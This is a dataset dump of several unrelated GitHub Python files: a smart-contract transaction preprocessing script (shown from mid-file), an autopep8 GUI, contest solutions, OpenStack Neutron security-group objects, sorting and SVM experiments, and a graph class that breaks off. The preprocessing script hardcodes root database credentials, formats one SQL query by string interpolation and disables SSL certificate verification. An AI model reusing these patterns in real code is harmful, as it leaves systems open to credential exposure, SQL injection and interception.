tx['gameName'], tx['gameAddress'], tx['hashKey'], 0,\n            tx['sender'], tx['senderType'], tx['senderName'], tx['txMethod'], tx['receiver'], tx['receiverType'], tx['receiverName'], \n            tx['txLabel'], tx['txLabelNew'], tx['labelReason'], None, None, None, None,\n            None, None, None, None, \"1\", seedGame, None\n            )\n        return r\n\n    def tupleBuildInEnlarger(self, r):\n        try:\n            tx = dict()\n            tx['hashKey'] = r[0]\n            tx['txDate'] = r[4]\n            tx['gameName'] = r[2]\n            tx['gameAddress'] = r[3]\n            tx[\"txMethod\"] = r[5]\n            tx['sender'] = r[1]\n            tx['senderType'] = self.typeIdentify(r[1])\n            tx['senderName'] = None\n            tx['receiver'] = r[6]\n            tx['receiverType'] = self.typeIdentify(r[6])\n            tx['receiverName'] = r[7]\n            tx['txLabel'] = None\n            tx['txLabelNew'] = None\n            tx['labelReason'] = \"ExtendTx\"\n            tx['profit'] = None\n            tx['traceCnt'] = None\n            seedGame = r[2]\n        except Exception as e:\n            print(e)\n            print(r[6])\n        r = ( tx['hashKey'], tx['txDate'], tx['gameName'], tx['gameAddress'], tx['hashKey'], 0,\n            tx['sender'], tx['senderType'], tx['senderName'], tx['txMethod'], tx['receiver'], tx['receiverType'], tx['receiverName'], \n            tx['txLabel'], tx['txLabelNew'], tx['labelReason'], None, None, None, None,\n            None, None, None, None, \"1\", seedGame, None\n            )\n        return r\n\n    def saveTestsetToDB(self, pickedTxList):\n        \n        db = pymysql.connect('localhost', 'root', 'hello', 'dapp_analysis_rearrange')\n        cursor = db.cursor()\n        updateSql = \"INSERT INTO TransactionDescription_testset_extend(hashKey, txDate, gameName, gameAddress, seed, similarity, sender, senderType, senderName, txMethod, receiver, receiverType, receiverName, txLabel, txLabelNew, labelReason, suicide, profit, traceCnt, prepare, value, input, isError, contractAddress, ori, seedGame, stage) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\n        rep = []\n        for tx in pickedTxList:\n            try:\n                r = self.tupleBuildInTest(tx)\n                rep.append(r)\n                cursor.execute(updateSql, r)\n                db.commit()\n            except Exception as e:\n                db.rollback()\n                print(e)\n                # print(\"hashkey is %s\")\n                print(r)\n                continue\n\n        db.close()\n\n    def saveEnlargerToDB(self, pickedTxList):\n        db = pymysql.connect('localhost', 'root', 'hello', 'dapp_analysis_rearrange')\n        cursor = db.cursor()\n\n        handled_tx = \"select distinct `hashKey` from 
TransactionDescription_goodset_extend where gameName = \\\"%s\\\";\" % self.gameName\n cursor.execute(handled_tx)\n handled_rep = set([r[0] for r in cursor.fetchall()])\n\n updateSql = \"INSERT INTO TransactionDescription_goodset_extend(hashKey, txDate, gameName, gameAddress, seed, similarity, sender, senderType, senderName, txMethod, receiver, receiverType, receiverName, txLabel, txLabelNew, labelReason, suicide, profit, traceCnt, prepare, value, input, isError, contractAddress, ori, seedGame, graphDistance, dateDistance, stage, seedEOA, txGameName, txGameAddress) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\"\n for r in pickedTxList:\n if r[0] not in handled_rep:\n try:\n cursor.execute(updateSql, r[:-1])\n db.commit()\n except Exception as e:\n db.rollback()\n print(e)\n print(\"hashkey is %s\" % r[0])\n # print(r)\n continue\n\n db.close()\n\nif __name__ == \"__main__\":\n context = ssl._create_unverified_context()\n requests.adapters.DEFAULT_RETRIES = 500\n game = \"godgame\"\n\n pre = Preprocessing(game)\n pre.preprocessing()\n\n\n\n","repo_name":"serea/smart_contract_lifecycle","sub_path":"DEFIER/Clustering/Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":27603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41742130704","text":"import tkinter as tk\nfrom tkinter import filedialog, messagebox, simpledialog\nimport autopep8\nimport os\n\ndef format_file(file_path, original=False):\n try:\n with open(file_path, 'r') as file:\n original_code = file.read()\n\n formatted_code = autopep8.fix_code(original_code, options={'aggressive': 1})\n\n # If original is True, save the formatted code to a new file\n if original:\n base, ext = os.path.splitext(file_path)\n new_file_path = f\"{base}_formatted{ext}\"\n with open(new_file_path, 'w') as file:\n file.write(formatted_code)\n output(f\"Formatted and saved as new file: {os.path.basename(new_file_path)}\")\n else:\n with open(file_path, 'w') as file:\n file.write(formatted_code)\n output(f\"Formatted: {os.path.basename(file_path)}\")\n\n except Exception as e:\n messagebox.showerror(\"Error\", f\"An error occurred while formatting: {e}\")\n\ndef select_directory():\n directory_path = filedialog.askdirectory()\n if not directory_path:\n return\n\n # Clear the listbox and text widget\n file_listbox.delete(0, tk.END)\n text_widget.delete(1.0, tk.END)\n\n # List .py files in the directory\n for filename in sorted(os.listdir(directory_path)):\n if filename.endswith('.py'):\n file_listbox.insert(tk.END, filename)\n\n # Update the current directory path\n global current_directory\n current_directory = directory_path\n\ndef format_selected_file():\n if not current_directory:\n messagebox.showinfo(\"Info\", \"Please select a directory first.\")\n return\n\n selected = file_listbox.curselection()\n if not selected:\n messagebox.showinfo(\"Info\", \"Please select a file to format.\")\n return\n\n filename = file_listbox.get(selected[0])\n file_path = os.path.join(current_directory, filename)\n\n # Ask if the user wants to keep the original file\n keep_original = messagebox.askyesno(\"Keep Original\", \"Do you want to keep the original file?\")\n format_file(file_path, original=keep_original)\n\ndef output(message):\n text_widget.insert(tk.END, message + '\\n')\n text_widget.see(tk.END)\n\n# Create the main window\nroot = tk.Tk()\nroot.title(\"AutoPEP8 
Formatter\")\n\ncurrent_directory = ''\n\n# Create and place the select directory button\nselect_button = tk.Button(root, text=\"Select Directory\", command=select_directory)\nselect_button.pack(pady=5)\n\n# Create and place the listbox for file selection\nfile_listbox = tk.Listbox(root)\nfile_listbox.pack(pady=5, fill=tk.BOTH, expand=True)\n\n# Create and place the format button\nformat_button = tk.Button(root, text=\"Format Selected File\", command=format_selected_file)\nformat_button.pack(pady=5)\n\n# Create and place the text widget for output\ntext_widget = tk.Text(root, height=10)\ntext_widget.pack(pady=5, fill=tk.BOTH, expand=True)\n\n# Start the GUI event loop\nroot.mainloop()\n","repo_name":"growcacti/Misc_scripts","sub_path":"Autopep8V2.py","file_name":"Autopep8V2.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1435237870","text":"def solve():\n N = input()\n L = len(N)\n first = N[0]\n minus = False\n near = int(first*L)\n if (int(N) < near): minus = True\n return (L - 1) * 9 + int(first) - int(minus)\n\nT = int(input())\nfor _ in range(T):\n print(solve())\n","repo_name":"henryliuser/hliu-cp","sub_path":"codeforces/L0/ordinary_numbers.py","file_name":"ordinary_numbers.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"8671943301","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron_lib import context as context_lib\nfrom neutron_lib.db import api as db_api\nfrom neutron_lib.objects import common_types\nfrom neutron_lib.utils import net as net_utils\nfrom oslo_utils import versionutils\nfrom oslo_versionedobjects import fields as obj_fields\nfrom sqlalchemy import or_\n\nfrom neutron.db.models import securitygroup as sg_models\nfrom neutron.db import rbac_db_models\nfrom neutron.objects import base\nfrom neutron.objects import ports\nfrom neutron.objects import rbac\nfrom neutron.objects import rbac_db\n\n\n@base.NeutronObjectRegistry.register\nclass SecurityGroupRBAC(rbac.RBACBaseObject):\n # Version 1.0: Initial version\n # Version 1.1: Changed 'target_tenant' to 'target_project'\n VERSION = '1.1'\n\n db_model = rbac_db_models.SecurityGroupRBAC\n\n\n@base.NeutronObjectRegistry.register\nclass SecurityGroup(rbac_db.NeutronRbacObject):\n # Version 1.0: Initial version\n # Version 1.1: Add RBAC support\n # Version 1.2: Added stateful support\n # Version 1.3: Added support for remote_address_group_id in rules\n # Version 1.4: Added support for normalized_cidr in rules\n # Version 1.5: Make the shared field nullable\n # Version 1.6: Added \"belongs_to_default_sg\" field in rules\n VERSION = '1.6'\n\n # required by RbacNeutronMetaclass\n rbac_db_cls = SecurityGroupRBAC\n db_model = sg_models.SecurityGroup\n\n fields = {\n 'id': common_types.UUIDField(),\n 'name': obj_fields.StringField(nullable=True),\n 'project_id': obj_fields.StringField(nullable=True),\n 'shared': obj_fields.BooleanField(nullable=True),\n 'stateful': obj_fields.BooleanField(default=True),\n 'is_default': obj_fields.BooleanField(default=False),\n 'rules': obj_fields.ListOfObjectsField(\n 'SecurityGroupRule', nullable=True\n ),\n # NOTE(ihrachys): we don't include source_rules that is present in the\n # model until we realize it's actually needed\n }\n\n fields_no_update = ['project_id', 'is_default']\n\n synthetic_fields = ['is_default', 'rules']\n\n extra_filter_names = {'is_default'}\n\n lazy_fields = set(['rules'])\n\n def create(self):\n # save is_default before super() resets it to False\n is_default = self.is_default\n with self.db_context_writer(self.obj_context):\n super(SecurityGroup, self).create()\n if is_default:\n default_group = DefaultSecurityGroup(\n self.obj_context,\n project_id=self.project_id,\n security_group_id=self.id)\n default_group.create()\n self.is_default = True\n self.obj_reset_changes(['is_default'])\n\n def from_db_object(self, db_obj):\n super(SecurityGroup, self).from_db_object(db_obj)\n if self._load_synthetic_fields:\n setattr(self, 'is_default',\n bool(db_obj.get('default_security_group')))\n self.obj_reset_changes(['is_default'])\n\n @classmethod\n def get_sg_by_id(cls, context, sg_id):\n return super(SecurityGroup, cls).get_object(context, id=sg_id)\n\n def obj_make_compatible(self, primitive, target_version):\n _target_version = versionutils.convert_version_to_tuple(target_version)\n\n def _filter_rules(rules, version):\n sg_rule = SecurityGroupRule()\n for rule in rules:\n r_version = versionutils.convert_version_to_tuple(\n rule['versioned_object.version'])\n if r_version > versionutils.convert_version_to_tuple(version):\n sg_rule.obj_make_compatible(\n rule['versioned_object.data'], version)\n rule['versioned_object.version'] = version\n\n if _target_version < (1, 1):\n primitive.pop('shared')\n if _target_version < (1, 2):\n 
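# 'stateful' was only added in object version 1.2, so strip it when downgrading below that\n            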
primitive.pop('stateful')\n if _target_version < (1, 3):\n if 'rules' in primitive:\n _filter_rules(primitive['rules'], '1.0')\n if _target_version < (1, 4):\n if 'rules' in primitive:\n _filter_rules(primitive['rules'], '1.1')\n if _target_version < (1, 6):\n if 'rules' in primitive:\n _filter_rules(primitive['rules'], '1.2')\n\n @classmethod\n def get_bound_project_ids(cls, context, obj_id):\n port_objs = ports.Port.get_objects(context,\n security_group_ids=[obj_id])\n return {port.project_id for port in port_objs}\n\n\n@base.NeutronObjectRegistry.register\nclass DefaultSecurityGroup(base.NeutronDbObject):\n # Version 1.0: Initial version\n VERSION = '1.0'\n\n db_model = sg_models.DefaultSecurityGroup\n\n fields = {\n 'project_id': obj_fields.StringField(),\n 'security_group_id': common_types.UUIDField(),\n }\n\n fields_no_update = ['security_group_id']\n\n primary_keys = ['project_id']\n\n\n@base.NeutronObjectRegistry.register\nclass SecurityGroupRule(base.NeutronDbObject):\n # Version 1.0: Initial version\n # Version 1.1: Add remote address group support\n # Version 1.2: Added normalized cidr column\n # Version 1.3: Added belongs_to_default_sg column\n VERSION = '1.3'\n\n db_model = sg_models.SecurityGroupRule\n\n fields = {\n 'id': common_types.UUIDField(),\n 'project_id': obj_fields.StringField(nullable=True),\n 'security_group_id': common_types.UUIDField(),\n 'remote_group_id': common_types.UUIDField(nullable=True),\n 'direction': common_types.FlowDirectionEnumField(nullable=True),\n 'ethertype': common_types.EtherTypeEnumField(nullable=True),\n 'protocol': common_types.IpProtocolEnumField(nullable=True),\n 'port_range_min': common_types.PortRangeWith0Field(nullable=True),\n 'port_range_max': common_types.PortRangeWith0Field(nullable=True),\n 'remote_ip_prefix': common_types.IPNetworkField(nullable=True),\n 'remote_address_group_id': common_types.UUIDField(nullable=True),\n 'normalized_cidr': common_types.IPNetworkField(nullable=True),\n 'belongs_to_default_sg': obj_fields.BooleanField(default=False),\n }\n\n synthetic_fields = ['normalized_cidr',\n 'belongs_to_default_sg',\n ]\n\n foreign_keys = {'SecurityGroup': {'security_group_id': 'id'}}\n\n fields_no_update = ['project_id',\n 'security_group_id',\n 'remote_group_id',\n 'remote_address_group_id',\n 'belongs_to_default_sg',\n ]\n\n def obj_make_compatible(self, primitive, target_version):\n _target_version = versionutils.convert_version_to_tuple(target_version)\n if _target_version < (1, 1):\n primitive.pop('remote_address_group_id', None)\n if _target_version < (1, 2):\n primitive.pop('normalized_cidr', None)\n if _target_version < (1, 3):\n primitive.pop('belongs_to_default_sg', None)\n\n # TODO(sayalilunkad): get rid of it once we switch the db model to using\n # custom types.\n @classmethod\n def modify_fields_to_db(cls, fields):\n result = super(SecurityGroupRule, cls).modify_fields_to_db(fields)\n remote_ip_prefix = result.get('remote_ip_prefix')\n if remote_ip_prefix:\n result['remote_ip_prefix'] = cls.filter_to_str(remote_ip_prefix)\n return result\n\n def _load_normalized_cidr(self, db_obj=None):\n db_obj = db_obj or SecurityGroupRule.get_object(self.obj_context,\n id=self.id)\n if not db_obj:\n return\n\n cidr = None\n if db_obj.remote_ip_prefix:\n cidr = net_utils.AuthenticIPNetwork(db_obj.remote_ip_prefix).cidr\n\n setattr(self, 'normalized_cidr', cidr)\n self.obj_reset_changes(['normalized_cidr'])\n\n def from_db_object(self, db_obj):\n super(SecurityGroupRule, self).from_db_object(db_obj)\n 
self._load_normalized_cidr(db_obj)\n if self._load_synthetic_fields:\n setattr(self, 'belongs_to_default_sg',\n bool(db_obj.get('default_security_group')))\n self.obj_reset_changes(['belongs_to_default_sg'])\n\n def obj_load_attr(self, attrname):\n if attrname == 'normalized_cidr':\n return self._load_normalized_cidr()\n super(SecurityGroupRule, self).obj_load_attr(attrname)\n\n # TODO(sayalilunkad): get rid of it once we switch the db model to using\n # custom types.\n @classmethod\n def modify_fields_from_db(cls, db_obj):\n fields = super(SecurityGroupRule, cls).modify_fields_from_db(db_obj)\n if 'remote_ip_prefix' in fields:\n fields['remote_ip_prefix'] = (\n net_utils.AuthenticIPNetwork(fields['remote_ip_prefix']))\n return fields\n\n @classmethod\n def get_security_group_rule_ids(cls, project_id):\n \"\"\"Retrieve all SG rules related to this project_id\n\n This method returns the SG rule IDs that meet these conditions:\n - The rule belongs to this project_id\n - The rule belongs to a security group that belongs to the project_id\n \"\"\"\n context = context_lib.get_admin_context()\n # NOTE(ralonsoh): do no use a READER decorator in this method. Elevated\n # permissions are needed here.\n with db_api.CONTEXT_READER.using(context):\n query = context.session.query(cls.db_model.id)\n query = query.join(\n SecurityGroup.db_model,\n cls.db_model.security_group_id == SecurityGroup.db_model.id)\n clauses = or_(SecurityGroup.db_model.project_id == project_id,\n cls.db_model.project_id == project_id)\n rule_ids = query.filter(clauses).all()\n return [rule_id[0] for rule_id in rule_ids]\n","repo_name":"openstack/neutron","sub_path":"neutron/objects/securitygroup.py","file_name":"securitygroup.py","file_ext":"py","file_size_in_byte":10495,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"13830300569","text":"from simple_perceptron import Perceptron\nfrom support_vector_machine import SVM\nimport random\n\ndef random_point():\n '''\n Returns a random 2-dimensional vector of floats between -1 and +1\n '''\n return [random.uniform(-1., 1.), random.uniform(-1., 1.)]\n\ndef generate_line():\n '''\n Randomly generates a line from 2 random points in [-1,1]x[-1,1]\n and returns the tuple (m, q, inv) for y = mx + q with inv a boolean which decides what side of the line maps to +1\n (ignores vertical lines)\n '''\n while (True):\n pointA = random_point()\n pointB = random_point()\n if ((pointB[0] - pointA[0]) != 0):\n break\n\n m = (pointB[1] - pointA[1]) / (pointB[0] - pointA[0])\n q = pointA[1] - m*pointA[0]\n inv = bool(random.getrandbits(1))\n return (m, q, inv)\n\ndef compute_f(line, point):\n '''\n Takes an (m, q, inv) tuple representing a line and takes a point, computes f(x)\n Returns 1 if the point is over the line, returns -1 if it's under it\n '''\n if (point[1] >= (line[0]*point[0] + line[1])):\n if (line[2]):\n return 1\n else:\n return -1\n else:\n if (line[2]):\n return -1\n else:\n return 1\n\n\ndef generate_dataset(line, n):\n '''\n Takes an (m, q, inv) tuple representing a line and n=total number of datapoints to generate\n Returns a length n list of tuples (x, y) with x a random vector and y=f(x)\n '''\n data = []\n for c in range(n):\n x = random_point()\n y = compute_f(line, x)\n data.append((x, y))\n\n return data\n\ndef experiment(n):\n s = SVM(2)\n p = Perceptron(2)\n tot_better = 0\n tot_sv = 0\n for run in range(1000):\n line = generate_line()\n data = []\n alleq = True\n while alleq:\n data = generate_dataset(line, 
n)\n            prevy = data[0][1]\n            for i in range(1, len(data)):\n                if data[i][1]!=prevy:\n                    alleq = False\n                    break\n                prevy = data[i][1]\n        s.reset(data)\n        p.reset(data)\n        s.solve()\n        tot_sv += len(s.suppvectors)\n        p.train()\n        new_data = generate_dataset(line, n*5)\n        if p.f_disagreement(new_data) > s.classification_error(new_data):\n            tot_better += 1\n    perc_better = tot_better/1000\n    avg_sv = tot_sv / 1000\n    return (perc_better, avg_sv)\n\n#print(experiment(10))\nprint(experiment(100))\n","repo_name":"elvisnava/machine-learning","sub_path":"support_vector_machine_test.py","file_name":"support_vector_machine_test.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15186897159","text":"import heapq\r\nN = int(input())\r\nAB = [[int(_) for _ in input().split()] for _ in range(N - 1)]\r\nG = {}\r\nfor a, b in AB:\r\n    a -= 1\r\n    b -= 1\r\n    #0-indexed\r\n    G[a] = G.get(a, set())\r\n    G[b] = G.get(b, set())\r\n    G[a].add(b)\r\n    G[b].add(a)\r\n\r\n\r\ndef dijkstra_stack(i):\r\n    D = [-1] * N\r\n    D[i] = 0\r\n    stack = [i]\r\n    while True:\r\n        i = stack.pop(0)\r\n        update = False\r\n        for j in G[i]:\r\n            if D[j] == -1:\r\n                update = True\r\n                D[j] = D[i] + 1\r\n                stack += [j]\r\n        if not stack:\r\n            break\r\n    return D\r\n\r\n\r\nD_Fennec = dijkstra_stack(0)\r\nD_Snuke = dijkstra_stack(N - 1)\r\n\r\nf = 0\r\ns = 0\r\nfor i in range(N):\r\n    if D_Fennec[i] <= D_Snuke[i]:\r\n        f += 1\r\n    else:\r\n        s += 1\r\nif f > s:\r\n    print('Fennec')\r\nelse:\r\n    print('Snuke')","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc078/B/3961686.py","file_name":"3961686.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"28965730825","text":"# Aufgabenteil a)\ndef is_sorted(L):\n\t'''Kontrolliert ob eine Liste sortiert ist, für ansteigend sortierte Listen wird 1 zurüch gegeben, für absteigend sortierted Listen -1, für unsortierte 0 und für Listen mit gleichem Element None.'''\n\tsort = None\n\ti = 0\n\twhile sort == None and i+1 < len(L):\n\t\tif L[i] < L[i+1]: \n\t\t\t#Liste ist nicht absteigend\n\t\t\tsort = 1\n\t\telif L[i] > L[i+1]: \n\t\t\t#Liste ist nicht aufsteigend\n\t\t\tsort = -1 \n\t\ti += 1\n\twhile sort == 1 and i+1 < len(L):\n\t\tif L[i] > L[i+1]: \n\t\t\t#Liste ist weder auf- noch absteigend\n\t\t\tsort = 0\n\t\ti += 1\n\twhile sort == -1 and i+1 < len(L):\n\t\tif L[i] < L[i+1]: \n\t\t\t#Liste ist weder ab- noch aufsteigend\n\t\t\tsort = 0\n\t\ti += 1\n\treturn sort\n\n# Tests\nL1 = [1,2,3,4,5]\nL2 = [5,4,3,2,1]\nL3 = [5,4,3,1,2]\nL4 = [1,2,3,5,4]\nL5 = [0,0]\nfor L in [L1,L2,L3,L4,L5]:\n\tprint(is_sorted(L))\nprint()\n\n# Aufgabenteil b)\nfrom random import randint\ndef generate_random_list(a=0,b=99,n=50):\n\t'''Generiert eine Liste der Länge n mit ganzen Zufallszahlen im Bereich zwischen a und b.'''\n\treturn [ randint(a,b) for i in range(n) ]\n\n# Aufgabenteil c)\ndef bubble_sort(L,lo,up):\n\t'''Sortiert den abschnitt zwischen lo und up der gegebene Liste L mit Bubble-Sort.'''\n\tremain_up = up-1\n\tdone = False\n\twhile not done:\n\t\tdone = True\n\t\tfor i in range(lo,remain_up):\n\t\t\tif L[i] > L[i+1]:\n\t\t\t\tdone = False\n\t\t\t\tL[i], L[i+1] = L[i+1], L[i]\n\t\tremain_up -= 1\n\ndef merge(L,H,lo,up,mid):\n\t'''Merged die beiden Listenabschnitte von L zwischen lo-mid und mid-up in der Hilfsliste H.'''\n\ti = lo\n\tj = mid\n\tfor k in range(lo,up):\n\t\tif i < mid and j < up:\n\t\t\tif L[i] <= 
L[j]:\n\t\t\t\tH[k] = L[i]\n\t\t\t\ti += 1\n\t\t\telse:\n\t\t\t\tH[k] = L[j]\n\t\t\t\tj += 1\n\t\telif i < mid:\n\t\t\tH[k] = L[i]\n\t\t\ti += 1\n\t\telif j < up:\n\t\t\tH[k] = L[j]\n\t\t\tj += 1\n\ndef merge_sort(L,H,lo,up,length,threshold=9):\n\t'''Sortiert die Liste L zwischen up und lo. Dabei wird die Hilfsliste H verwendet und die Liste wird an der Stelle lo+length geteilt. Up threshold wird Bubble-Sort verwendet.'''\n\tif length <= threshold:\n\t\t# print(\"SORTING:\\nlength: %s, lo: %s, up: %s\" % (length,lo,up))\n\t\t# print(\" L: %s \\n ->\" % (L) )\n\t\tbubble_sort(L,lo,up)\n\t\t# print(\" L: %s \\n\" % (L) )\n\telse:\n\t\tmid = lo+length\n\t\tL = merge_sort(L,H,lo,mid,length//2,threshold) #rekursiv die erste Hälfte sortieren\n\t\tL = merge_sort(L,H,mid,up,length//2,threshold) #rekursiv die zweite Hälfte sortieren\n\t\t# print(\"MERGING:\\nlength: %s, lo: %s, up: %s, mid: %s\" % (length,lo,up,mid))\n\t\t# print(\" L: %s \\n H: %s \\n ->\" % (L,H) )\n\t\tmerge(L,H,lo,up,mid)\n\t\t# print(\" H: %s \\n\" % (H) )\n\t\tL = H[:] #L updaten\n\treturn L\n\ndef merge_sort_init(L,threshold=9):\n\t'''Sortiert die Liste L mit Mergesort. Optional, kann angegeben werden, ab welchem threshold Bubble-Sort benutzt werden soll.'''\n\tif len(L) < threshold:\n\t\tbubble_sort(L,0,len(L))\n\telse:\n\t\tH = L[:]\n\t\tlength = len(L)//2 #gibt die Länge der zu mergenden Listen an\n\t\tL = merge_sort(L,H,0,len(L),length,threshold)\n\treturn L\n\n# Tests\nfor i in range(10):\n\tL = generate_random_list(0,20,16)\n\tL = merge_sort_init(L)\n\t# L = [16, 14, 6, 5, 1, 7, 10, 4, 15, 9, 2, 12, 11, 13, 3, 8] \n\t# L = merge_sort_init(L,2)\n\tif is_sorted(L) == 1: print(\"Eine Liste wurde erfolgreich sortiert\")\n\telse: print(\"!!! ERROR !!!\")\nprint()\n\n# Aufgabenteil d\n\ndef merge_sort(L,threshold=9):\n\t'''Sortiert die Liste L mit Mergesort. Optional, kann angegeben werden, ab welchem threshold Bubble-Sort benutzt werden soll.'''\n\tlen_L = len(L)\n\tsize = min(threshold,len_L)\n\t#sortiere die Teillisten\n\tfor lo in [i*size for i in range(round(len_L/size+.5))]:\n\t\tup = min(lo+size,len_L)\n\t\t# print(\"SORTING:\\nlength: %s, lo: %s, up: %s\" % (size,lo,up))\n\t\t# print(\" L: %s \\n ->\" % (L) )\n\t\tbubble_sort(L,lo,up)\n\t\t# print(\" L: %s \\n\" % (L) )\n\t#merge die Teillisten\n\twhile size < len_L:\n\t\tH = L[:] #H updaten\n\t\tfor lo in [i*2*size for i in range(round(len_L/(2*size)+.5))]:\n\t\t\tmid = lo+size\n\t\t\tup = min(lo+2*size,len_L)\n\t\t\t# print(\"MERGING:\\nlength: %s, lo: %s, up: %s, mid: %s\" % (size,lo,up,mid))\n\t\t\t# print(\" L: %s \\n H: %s \\n ->\" % (L,H) )\n\t\t\tmerge(L,H,lo,up,mid)\n\t\t\t# print(\" H: %s \\n\" % (H) )\n\t\t\tL = H[:] #L updaten\n\t\tsize *= 2\n\treturn L\n\n# Tests\nfor i in range(10):\n\tL = generate_random_list(0,20,16)\n\tL = merge_sort(L)\n\t# L = [16, 14, 6, 5, 1, 7, 10, 4, 15, 9, 2, 12, 11, 13, 3, 8] \n\t# L = merge_sort(L,2)\n\tif is_sorted(L) == 1: print(\"Eine Liste wurde erfolgreich sortiert\")\n\telse: print(\"!!! 
ERROR !!!\")\n","repo_name":"MrLoh/ALP2-Uebungen","sub_path":"U04/A1 - mergesort.py","file_name":"A1 - mergesort.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28087615388","text":"from rest_framework.serializers import ModelSerializer\nfrom sample_app.models import SampleModel\n\n\nclass SampleModelSerializer(ModelSerializer):\n\n def create(self, validated_data):\n instance, _ = SampleModel.objects.get_or_create(**validated_data)\n return instance\n\n class Meta:\n model = SampleModel\n fields = '__all__'\n","repo_name":"Arkiralor/Articles","sub_path":"src/sample_app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24388004497","text":"from enum import Enum\r\nfrom typing import Any, Callable\r\nfrom typing import Optional\r\nfrom typing import Dict, List\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\n\r\nclass EdgeType(Enum):\r\n directed = 1\r\n undirected = 2\r\n\r\nclass Vertex:\r\n def __init__(self, data):\r\n self.data = data\r\n\r\n data: Any\r\n index: int\r\n\r\nclass Edge:\r\n source: Vertex\r\n destination: Vertex\r\n weight: Optional[float]\r\n\r\nclass Graph:\r\n adjacencies: Dict[Vertex, List[Edge]]\r\n\r\n def __init__(self, adjacencies):\r\n self.adjacencies = adjacencies\r\n\r\n def create_vertex(self, data: Any) -> Vertex:\r\n cortex = Vertex(data)\r\n self.adjacencies.update({cortex: []})\r\n return cortex\r\n\r\n def add_directed_edge(self, source: Vertex, destination: Vertex, weight: Optional[float] = None) -> None:\r\n sc = Edge()\r\n sc.source = source\r\n sc.destination = destination\r\n sc_graf = self.adjacencies.get(source)\r\n sc_graf.append(sc)\r\n\r\n def add_undirected_edge(self, edge: EdgeType, source: Vertex, destination: Vertex,\r\n weight: Optional[float] = None) -> None:\r\n self.add_directed_edge(source, destination)\r\n self.add_directed_edge(destination, source)\r\n\r\n def add(self, edge: EdgeType, source: Vertex, destination: Vertex, weight: Optional[float] = None) -> None:\r\n if edge == 1:\r\n self.add_directed_edge(source, destination)\r\n\r\n if edge == 2:\r\n self.add_undirected_edge(source, destination)\r\n\r\n def traverse_breadth_first(self, visit: Callable[[Any], None]) -> None:\r\n pass\r\n\r\n def traverse_depth_first(self, visit: Callable[[Any], None]) -> None:\r\n pass\r\n\r\n def show(self):\r\n G = nx.DiGraph()\r\n for x in self.adjacencies.values():\r\n for y in x:\r\n G.add_edge(y.source.data, y.destination.data)\r\n nx.draw(G, with_labels=True)\r\n plt.show()\r\n\r\n def print(self):\r\n for x in self.adjacencies.values():\r\n for y in x:\r\n print(y.source.data, \"----->\", y.destination.data)\r\n\r\ndef dead_path(g: Graph, cross_id: Any) -> Optional[List[Vertex]]:\r\n lista = []\r\n start = cross_id\r\n check = 0\r\n\r\n def fondue(a, lista, check):\r\n if check != 0:\r\n if a == start:\r\n return print(lista)\r\n check += 1\r\n\r\n for x in g.adjacencies.values():\r\n if x != []:\r\n for y in x:\r\n if a == y.source.data:\r\n lista.append(a)\r\n fondue(y.destination.data, lista, check)\r\n else:\r\n return None\r\n\r\n return fondue(cross_id, lista, check)\r\n\r\nslownik = {}\r\nslownik2 = {}\r\nslownik3 = {}\r\nGraf1 = Graph(slownik)\r\nGraf2 = Graph(slownik2)\r\nGraf3 = Graph(slownik3)\r\n\r\nvrt1 = Graf1.create_vertex(1)\r\nvrt9 = 
